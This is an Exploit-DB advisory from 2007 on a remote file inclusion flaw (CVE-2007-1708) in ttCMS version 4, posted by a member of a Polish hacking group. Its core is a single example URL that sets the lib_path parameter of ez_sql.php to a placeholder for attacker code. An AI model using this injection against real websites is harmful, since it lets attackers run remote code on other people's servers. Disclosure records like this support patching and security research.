ttCMS <= 4 - ez_sql.php lib_path Remote File Inclusion Vulnerability

2007-03-24T00:00:00
ID EDB-ID:3563
Type exploitdb
Reporter Kacper
Modified 2007-03-24T00:00:00

Description

ttCMS. CVE-2007-1708. Webapps exploit for php platform

                                        
                                            DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]

# milw0rm.com [2007-03-24]